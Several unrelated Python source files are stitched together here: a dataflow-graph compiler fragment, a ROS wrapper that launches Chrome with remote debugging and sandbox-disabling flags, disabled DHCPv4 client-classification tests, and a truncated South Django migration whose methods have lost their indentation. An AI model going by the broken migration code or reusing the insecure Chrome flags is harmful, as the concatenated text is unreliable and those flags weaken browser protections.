    @dispatch(ast.Store)
    def processStore(self, node):
        g = graph.GenericOp(self.hyperblock(), node)
        g.setPredicate(self.pred())
        self.localRead(g, node.expr)
        self.localRead(g, node.name)
        self.localRead(g, node.value)
        self.handleMemory(node, g)
        return g
    @dispatch(ast.Return)
    def processReturn(self, node):
        # Bind the return expressions to the return parameters, then
        # park the state for the final merge in handleExit().
        for dst, src in zip(self.code.codeparameters.returnparams, node.exprs):
            self.set(dst, self.get(src))
        self.returns.append(self.popState())
    @dispatch(ast.TypeSwitch)
    def processTypeSwitch(self, node):
        g = graph.GenericOp(self.hyperblock(), node)
        g.setPredicate(self.pred())
        self.localRead(g, node.conditional)
        # One predicate output per case.
        for i in range(len(node.cases)):
            p = graph.PredicateNode(self.hyperblock(), i)
            g.predicates.append(p.addDefn(g))
        branches = self.branch(g.predicates)
        exits = []
        for case, branch in zip(node.cases, branches):
            self.setState(branch)
            if case.expr:
                # The switch binds the matched value inside the case body.
                target = self.localTarget(case.expr)
                self.set(case.expr, target)
            else:
                target = None
            g.addLocalModify(case.expr, target)
            self(case.body)
            exits.append(self.popState())
        self.mergeStates(exits)
    @dispatch(str, type(None), ast.Code)
    def processLeaf(self, node):
        return None
    @dispatch(ast.Suite)
    def processOK(self, node):
        node.visitChildren(self)
    def handleExit(self):
        """Merge all return states and emit the graph's Exit node."""
        state = self.mergeStates(self.returns)
        killed = self.code.annotation.killed.merged
        self.dataflow.exit = graph.Exit(state.hyperblock)
        self.dataflow.exit.setPredicate(state.predicate)
        for name in self.allModified:
            if isinstance(name, ast.Local):
                # Only return parameters escape through the exit.
                if name in self.code.codeparameters.returnparams:
                    self.dataflow.exit.addExit(name, state.get(name))
            elif isinstance(name, storegraph.SlotNode):
                # Fields of killed objects die with the call.
                if name.object not in killed:
                    self.dataflow.exit.addExit(name, state.get(name))
    def setParameter(self, param):
        """Materialize one entry node per declared parameter (skips None)."""
        if isinstance(param, ast.Local):
            g = self.localTarget(param)
            self.entryState.set(param, g)
    def processCode(self):
        """Run the full translation and return the dataflow graph."""
        # Init the parameters
        params = self.code.codeparameters
        self.setParameter(params.selfparam)
        for p in (params.params):
            self.setParameter(p)
        assert not hasattr(params, 'kwds')
        self.setParameter(params.vparam)
        self.setParameter(params.kparam)
        self(self.code.ast)
        self.handleExit()
        return self.dataflow
def evaluateCode(compiler, code):
    """Build the dataflow graph for *code*, run dead-code elimination on
    it, and return it.  (*compiler* is accepted for interface parity but
    unused here.)"""
    dataflow = CodeToDataflow(code).processCode()
    dce.evaluateDataflow(dataflow)
    return dataflow
| |
import sys
import rospy
import socket
import shutil
import os
import requests
import threading
from lg_common import ManagedApplication, ManagedWindow
from lg_common.tcp_relay import TCPRelay
from lg_msg_defs.msg import ApplicationState
from tornado.websocket import websocket_connect
DEFAULT_BINARY = '/usr/bin/google-chrome'
DEFAULT_ARGS = [
'--enable-gpu-rasterization',
'--no-first-run',
'--no-sandbox',
'--test-type', # only needed to ignore --no-sandbox's warning message
'--allow-file-access-from-files',
'--disable-default-apps',
'--disable-java',
'--disable-session-storage',
'--disable-translate',
'--touch-events=enabled',
'--disable-pinch',
'--overscroll-history-navigation=0',
'--allow-running-insecure-content',
'--disable-touch-editing',
'--v=1',
'--enable-webgl',
'--ignore-gpu-blacklist',
'--touch-events=enabled',
'--disable-pinch',
'--overscroll-history-navigation=0',
'--autoplay-policy=no-user-gesture-required',
'--check-for-update-interval=1209600',
]
def set_interval(func, sec):
    """Invoke *func* every *sec* seconds using chained threading.Timer
    objects.

    Returns the first Timer; cancel() it to stop the chain before its
    next tick (each fired tick re-arms itself first).
    """
    def tick():
        # Re-arm before calling func so an exception in func does not
        # break the chain.
        set_interval(func, sec)
        func()
    timer = threading.Timer(sec, tick)
    timer.start()
    return timer
class ManagedBrowser(ManagedApplication):
    """A ManagedApplication running a Google Chrome instance.

    Builds the Chrome command line from the constructor arguments,
    manages a per-instance user-data/cache directory under /tmp, and
    relays the remote debugging port through a TCPRelay so the browser
    can be driven while suspended or hidden.
    """
    def __init__(
        self,
        url=None,
        slug=None,
        kiosk=True,
        user_data_dir=None,
        geometry=None,
        binary=DEFAULT_BINARY,
        remote_debugging_port=None,
        app=False,
        reload_aw_snap=False,
        shell=True,
        command_line_args=[],
        default_args_removal=[],
        disk_cache_size=314572800,
        log_level=0,
        extensions=[],
        log_stderr=False,
        user_agent='',
        pepper_flash_dir='/home/lg/inc/PepperFlash',
        pnacl_dir='/home/lg/inc/pnacl',
        layer=ManagedWindow.LAYER_NORMAL,
        **kwargs
    ):
        # NOTE: the mutable defaults above are kept for interface
        # compatibility; unlike before, they are never mutated below.
        # NOTE(review): `shell` and `disk_cache_size` are currently
        # unused -- confirm whether they should feed into cmd.
        # If no slug provided, attempt to use the node name.
        if slug is None:
            try:
                slug = rospy.get_name().lstrip('/')
            except Exception as e:
                sys.stderr.write('Could not resolve slug for this browser!')
                sys.stderr.write(' * Has your node been initialized?')
                raise e
        cmd = [binary]
        if user_agent:
            cmd.append('--user-agent={}'.format(user_agent))
        # If no debug port provided, pick one.
        if remote_debugging_port is None:
            remote_debugging_port = ManagedBrowser.get_os_port()
        # Chrome listens on debug_port; the relay exposes it on
        # remote_debugging_port while the app is suspended/hidden/visible.
        self.debug_port = ManagedBrowser.get_os_port()
        self.relay = TCPRelay(self.debug_port, remote_debugging_port)
        if log_stderr:
            cmd.append('--enable-logging=stderr')
        else:
            cmd.append('--enable-logging')
        cmd.append('--remote-debugging-port={}'.format(self.debug_port))
        cmd.append('--log-level={}'.format(log_level))
        self.user_data_dir = user_data_dir
        if self.user_data_dir:
            # Persistent profile: reused across runs, never cleared.
            rospy.logdebug('using data dir {}'.format(self.user_data_dir))
            self.tmp_dir = '/tmp/user_data_dirs/{}'.format(self.user_data_dir)
        else:
            # Throwaway profile keyed on the slug; wiped before use.
            self.tmp_dir = '/tmp/lg_browser_{}'.format(slug)
            rospy.logdebug('clearing tmp dir {}'.format(self.tmp_dir))
            self.clear_tmp_dir()
        self.pepper_flash_dir = pepper_flash_dir
        self.pnacl_dir = pnacl_dir
        self.init_tmp_dir()
        cmd.append('--user-data-dir={}'.format(self.tmp_dir))
        cmd.append('--disk-cache-dir={}'.format(self.tmp_dir))
        cmd.append('--crash-dumps-dir={}/crashes'.format(self.tmp_dir))
        # Keep only extensions whose directory exists.
        # Fix: the original removed items from `extensions` while
        # iterating it, which skips elements and mutates the caller's list.
        valid_extensions = []
        for extension in extensions:
            if os.path.isdir(extension):
                valid_extensions.append(extension)
            else:
                rospy.logwarn("Could not load extension from %s because dir does not exist" % extension)
        if valid_extensions:
            cmd.append('--load-extension={}'.format(','.join(valid_extensions)))
        # Fix: filter into a per-instance list instead of removing
        # entries from the module-level DEFAULT_ARGS, which leaked the
        # removals into every subsequently created ManagedBrowser.
        cmd.extend(arg for arg in DEFAULT_ARGS if arg not in default_args_removal)
        if command_line_args:
            cmd.extend(command_line_args)

        # All remaining kwargs are mapped to command line args.
        # _ is replaced with -.
        def consume_kwarg(item):
            key, value = item
            arg = '--{}'.format(key.replace('_', '-'))
            if value is None:
                return arg
            if isinstance(value, bool):
                arg += '=' + str(value).lower()
            else:
                arg += '=' + str(value)
            return arg
        cmd.extend(map(consume_kwarg, kwargs.items()))
        if app:
            cmd.append('--app={}'.format(url))
        else:
            if kiosk:
                cmd.append('--kiosk')
            # NOTE(review): the URL is only appended in non-app mode;
            # in app mode it already rides in --app=.
            if url is not None:
                cmd.append(url)
        # finishing command line and piping output to logger
        rospy.logdebug("Starting cmd: %s" % cmd)
        # Different versions of Chrome use different window instance names.
        # Matching the tmp_dir should work for all of them.
        w_instance = 'google-chrome ({})'.format(self.tmp_dir)
        window = ManagedWindow(
            w_instance=w_instance,
            geometry=geometry,
            chrome_kiosk_workaround=kiosk,
            layer=layer,
        )
        rospy.logdebug("Command {}".format(cmd))
        if reload_aw_snap:
            self.set_aw_snap_timer()
        # clean up after thyself
        rospy.on_shutdown(self.clear_tmp_dir)
        super(ManagedBrowser, self).__init__(cmd=cmd, window=window)

    def post_init(self):
        """Register respawn/state handlers once ManagedApplication is set up."""
        super(ManagedBrowser, self).post_init()
        if not self.user_data_dir:
            # Throwaway profiles are wiped and rebuilt on each respawn.
            self.add_respawn_handler(self.clear_tmp_dir)
            self.add_respawn_handler(self.init_tmp_dir)
        self.add_state_handler(self.control_relay)

    def init_tmp_dir(self):
        """
        Creates the tmp dir,
        then links in the path to Chrome components like PepperFlash,
        then replaces the path in the latest-component-updated-flash file.
        """
        if os.path.exists(self.tmp_dir):
            if self.user_data_dir:
                return  # persistent profile already initialized: fine
            else:
                rospy.logerr("Temp dir exists for chrome already")
        try:
            os.mkdir(self.tmp_dir)
            os.mkdir(self.tmp_dir + '/PepperFlash')
        except Exception:
            rospy.logerr("Error trying to make the tmp dir, could exist already")
        # Link NaCl component. https://github.com/EndPointCorp/lg_ros_nodes/issues/357
        try:
            os.symlink(self.pnacl_dir, os.path.join(self.tmp_dir, 'pnacl'))
            rospy.loginfo("Linked `pnacl` directory %s" % self.pnacl_dir)
        except Exception as e:
            rospy.logerr("Error linking pNaCl, %s" % e)
        try:
            os.symlink(self.pepper_flash_dir + '/flash_dir', "%s/PepperFlash/flash_dir" % self.tmp_dir)
            # Rewrite the component manifest so its paths point at this
            # instance's tmp dir.
            with open("%s/latest-component-updated-flash" % self.pepper_flash_dir, "r") as f:
                out = f.read()
            with open("%s/PepperFlash/latest-component-updated-flash" % self.tmp_dir, "w") as f:
                f.write(out.replace("${TMP_DIR}", self.tmp_dir))
        except Exception as e:
            rospy.logerr("Error copying pepper flash into the tmp dir, %s" % e)

    def clear_tmp_dir(self):
        """
        Clears out all temporary files and disk cache for this instance.
        Persistent (user_data_dir) profiles are never cleared.
        """
        if self.user_data_dir:
            rospy.logerr('not clearing, because user data dir')
            return
        try:
            rospy.logerr("Purging ManagedBrowser directory: %s" % self.tmp_dir)
            shutil.rmtree(self.tmp_dir)
        except OSError as e:
            rospy.logdebug("Could not purge the %s directory because %s" % (self.tmp_dir, e))

    @staticmethod
    def get_os_port():
        """
        Lets the OS assign a free TCP port number and returns it.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.bind(('', 0))
        port = sock.getsockname()[1]
        sock.close()
        return port

    def list_pages_available_for_debug(self):
        """Return the list of debuggable pages from Chrome's devtools API."""
        debug_url = 'http://localhost:{}/json/list'.format(self.debug_port)
        return requests.get(debug_url).json()

    def set_aw_snap_timer(self):
        """Start a 1-second watchdog that reloads a dead/crashed page."""
        self.aw_snap_interval = set_interval(self.check_alive_and_reload, 1)

    def check_alive_and_reload(self):
        """Watchdog tick: reload the page if the browser looks dead."""
        if not self.check_alive():
            rospy.logerr("Browser is probably dead")
            self.reload_page()

    def reload_page(self):
        """Send an F5 keypress to the browser window via xdotool."""
        pid = self.proc.get_pid()
        if pid:
            cmd = "DISPLAY=:0 xdotool search --onlyvisible --all --pid {} --class Chrome windowfocus key F5".format(pid)
            os.system(cmd)

    def check_alive(self):
        """Return True if the debug endpoint reports at least one page.

        Fix: when the browser is dead, requests.get() raises instead of
        returning; treat any failure as "not alive" so the aw-snap
        watchdog can actually trigger a reload instead of crashing.
        """
        try:
            return len(self.list_pages_available_for_debug()) > 0
        except Exception:
            return False

    def send_debug_sock_msg(self, msg):
        """
        Writes a string to the browser's debug web socket.

        NOTE(review): this is a generator (bare `yield`) with no
        coroutine scheduler, so calling it does nothing until iterated;
        kept as-is pending a real async rework.
        """
        # Fix: rospy has no `warn`; the logging call is `logwarn`.
        rospy.logwarn(
            'ManagedBrowser.send_debug_sock_msg() probably not yet working'
        )
        ws_url = 'ws://localhost:{}'.format(self.debug_port)
        conn = yield websocket_connect(ws_url, connect_timeout=1)
        conn.write_message(msg)
        conn.close()

    def control_relay(self, state):
        """Stop the debug-port relay when the app stops; run it otherwise."""
        if state == ApplicationState.STOPPED:
            self.relay.stop()
        elif state in (
            ApplicationState.SUSPENDED,
            ApplicationState.HIDDEN,
            ApplicationState.VISIBLE,
        ):
            self.relay.start()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| |
"""DHCPv4 Client Classification - default classes"""
# pylint: disable=invalid-name,line-too-long
import pytest
import srv_control
import misc
import srv_msg
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_docsis3_boot_file_name():
    """A DISCOVER carrying vendor class 'docsis3.0' must land in the
    first subnet (guarded by VENDOR_CLASS_docsis3.0) and get that
    subnet's boot-file-name, not the global one."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_docsis3.0')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.config_srv('boot-file-name', 0, 'somefilename')
    srv_control.config_srv_opt('boot-file-name', 'someotherfilename')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    # The subnet-level boot file must win over the global option.
    srv_msg.response_check_content('file', 'somefilename')
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('file', 'someotherfilename', expected=False)
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(54)
    srv_msg.response_check_include_option(61)
    srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
    srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
    srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_docsis3_next_server():
    """A docsis3.0 client classified into the first subnet must receive
    both the subnet's boot-file-name and its next-server (siaddr)."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_docsis3.0')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.config_srv('boot-file-name', 0, 'somefilename')
    srv_control.subnet_add_siaddr(0, '192.0.2.234')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    # docsis3.0 clients get both the boot file and the subnet siaddr.
    srv_msg.response_check_content('file', 'somefilename')
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('siaddr', '192.0.2.234')
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(54)
    srv_msg.response_check_include_option(61)
    srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
    srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
    srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_global_next_server():
    """An eRouter1.0 client must get an address from its class's subnet
    but, per the eRouter default class, NO boot file and siaddr forced
    to 0.0.0.0 even though a global next-server is configured."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.config_srv('boot-file-name', 0, 'somefilename')
    srv_control.global_add_siaddr('192.0.2.2')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    # eRouter clients must not receive a boot file or next-server.
    srv_msg.response_check_content('file', 'somefilename', expected=False)
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('siaddr', '0.0.0.0')
    srv_msg.response_check_content('siaddr', '192.0.2.2', expected=False)
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(54)
    srv_msg.response_check_include_option(61)
    srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
    srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
    srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_subnet_next_server():
    """Same as the global-next-server case, but with the next-server set
    at subnet level: an eRouter1.0 client must still get siaddr 0.0.0.0
    and no boot file."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.config_srv('boot-file-name', 0, 'somefilename')
    srv_control.subnet_add_siaddr(0, '192.0.2.234')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')
    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    # eRouter clients must not receive a boot file or next-server.
    srv_msg.response_check_content('file', 'somefilename', expected=False)
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('siaddr', '0.0.0.0')
    srv_msg.response_check_content('siaddr', '192.0.2.234', expected=False)
    srv_msg.response_check_include_option(1)
    srv_msg.response_check_include_option(54)
    srv_msg.response_check_include_option(61)
    srv_msg.response_check_option_content(1, 'value', '255.255.255.0')
    srv_msg.response_check_option_content(54, 'value', '$(SRV4_ADDR)')
    srv_msg.response_check_option_content(61, 'value', '00010203040506')
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_one_class_eRouter1_two_next_servers():
    """With both a global siaddr (192.0.2.2) and a subnet-level siaddr
    (192.0.2.234) configured, an eRouter1.0 client must still receive
    siaddr 0.0.0.0 and no boot-file-name in the OFFER."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.config_srv('boot-file-name', 0, 'somefilename')
    srv_control.global_add_siaddr('192.0.2.2')
    srv_control.subnet_add_siaddr(0, '192.0.2.234')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    srv_msg.response_check_content('file', 'somefilename', expected=False)
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('siaddr', '0.0.0.0')
    # Neither the subnet-level nor the global next-server may leak through.
    for absent_siaddr in ('192.0.2.234', '192.0.2.2'):
        srv_msg.response_check_content('siaddr', absent_siaddr, expected=False)
    # Options that must be present in the OFFER.
    for option_code in (1, 54, 61):
        srv_msg.response_check_include_option(option_code)
    # Expected option payloads.
    for option_code, expected_value in ((1, '255.255.255.0'),
                                        (54, '$(SRV4_ADDR)'),
                                        (61, '00010203040506')):
        srv_msg.response_check_option_content(option_code, 'value', expected_value)
@pytest.mark.v4
@pytest.mark.classification
@pytest.mark.default_classes
@pytest.mark.disabled
def test_v4_client_classification_multiple_classes_three_subnets_docsis_erouter():
    """Three shared subnets keyed to different client classes:
    subnet 0 -> eRouter1.0 clients (siaddr/boot-file suppressed in OFFER),
    subnet 1 -> docsis3.0 clients (subnet siaddr 192.0.50.50 + 'somefilename'),
    subnet 2 -> unclassified clients (global siaddr 192.0.50.100)."""
    misc.test_setup()
    srv_control.config_srv_subnet('192.168.50.0/24', '192.168.50.1-192.168.50.1')
    srv_control.config_client_classification(0, 'VENDOR_CLASS_eRouter1.0')
    srv_control.subnet_add_siaddr(0, '192.0.50.1')
    srv_control.config_srv('boot-file-name', 0, 'filename')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.50-192.168.50.50')
    srv_control.config_client_classification(1, 'VENDOR_CLASS_docsis3.0')
    srv_control.subnet_add_siaddr(1, '192.0.50.50')
    srv_control.config_srv('boot-file-name', 1, 'somefilename')
    srv_control.config_srv_another_subnet_no_interface('192.168.50.0/24',
                                                       '192.168.50.100-192.168.50.100')
    srv_control.global_add_siaddr('192.0.50.100')
    srv_control.build_and_send_config_files()
    srv_control.start_srv('DHCP', 'started')

    # Exchange 1: eRouter1.0 client -> subnet 0; no siaddr/boot file exposed.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'eRouter1.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    for absent_siaddr in ('192.0.50.1', '192.0.50.50', '192.0.50.100'):
        srv_msg.response_check_content('siaddr', absent_siaddr, expected=False)
    for absent_file in ('somefilename', 'filename'):
        srv_msg.response_check_content('file', absent_file, expected=False)
    srv_msg.response_check_content('yiaddr', '192.168.50.1')
    srv_msg.response_check_content('siaddr', '0.0.0.0')

    # Exchange 2: docsis3.0 client -> subnet 1; gets its siaddr and boot file.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_does_include_with_value('vendor_class_id', 'docsis3.0')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    for absent_siaddr in ('192.0.50.1', '192.0.50.100', '0.0.0.0'):
        srv_msg.response_check_content('siaddr', absent_siaddr, expected=False)
    srv_msg.response_check_content('file', 'filename', expected=False)
    srv_msg.response_check_content('siaddr', '192.0.50.50')
    srv_msg.response_check_content('file', 'somefilename')
    srv_msg.response_check_content('yiaddr', '192.168.50.50')
    for option_code in (1, 54, 61):
        srv_msg.response_check_include_option(option_code)
    for option_code, expected_value in ((1, '255.255.255.0'),
                                        (54, '$(SRV4_ADDR)'),
                                        (61, '00010203040506')):
        srv_msg.response_check_option_content(option_code, 'value', expected_value)

    # Exchange 3: client without a vendor class -> subnet 2, global siaddr.
    misc.test_procedure()
    srv_msg.client_sets_value('Client', 'chaddr', '00:00:00:00:00:00')
    srv_msg.client_does_include_with_value('client_id', '00010203040506')
    srv_msg.client_requests_option(1)
    srv_msg.client_send_msg('DISCOVER')

    misc.pass_criteria()
    srv_msg.send_wait_for_message('MUST', 'OFFER')
    for absent_siaddr in ('192.0.50.1', '192.0.50.50', '0.0.0.0'):
        srv_msg.response_check_content('siaddr', absent_siaddr, expected=False)
    for absent_file in ('filename', 'somefilename'):
        srv_msg.response_check_content('file', absent_file, expected=False)
    srv_msg.response_check_content('yiaddr', '192.168.50.100')
    srv_msg.response_check_content('siaddr', '192.0.50.100')
    for option_code in (1, 54, 61):
        srv_msg.response_check_include_option(option_code)
    for option_code, expected_value in ((1, '255.255.255.0'),
                                        (54, '$(SRV4_ADDR)'),
                                        (61, '00010203040506')):
        srv_msg.response_check_option_content(option_code, 'value', expected_value)
| |
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
    """Add the nullable 'makey' ForeignKey to UserInteraction.

    The FK points at catalog.Makey with related_name 'interactions';
    keep_default=False so no default is baked into the schema.
    """
    makey_fk = self.gf('django.db.models.fields.related.ForeignKey')(
        related_name='interactions', null=True, to=orm['catalog.Makey'])
    db.add_column(u'catalog_userinteraction', 'makey', makey_fk,
                  keep_default=False)
def backwards(self, orm):
    """Reverse the migration: drop the 'makey' FK from UserInteraction.

    The database column is 'makey_id' (Django appends '_id' to FK names).
    """
    # Deleting field 'UserInteraction.makey'
    db.delete_column(u'catalog_userinteraction', 'makey_id')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'catalog.answer': {
'Meta': {'ordering': "['-created']", 'object_name': 'Answer'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'description': ('tinymce.models.HTMLField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'question': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.Question']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'catalog.article': {
'Meta': {'object_name': 'Article'},
'added_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'added_time_staff_pick': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.Comment']", 'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'is_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff_pick': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'new_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catalog.NewUser']", 'null': 'True', 'blank': 'True'}),
'rating': ('django.db.models.fields.IntegerField', [], {}),
'recommendation': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'score': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['catalog.ArticleTag']", 'null': 'True', 'blank': 'True'}),
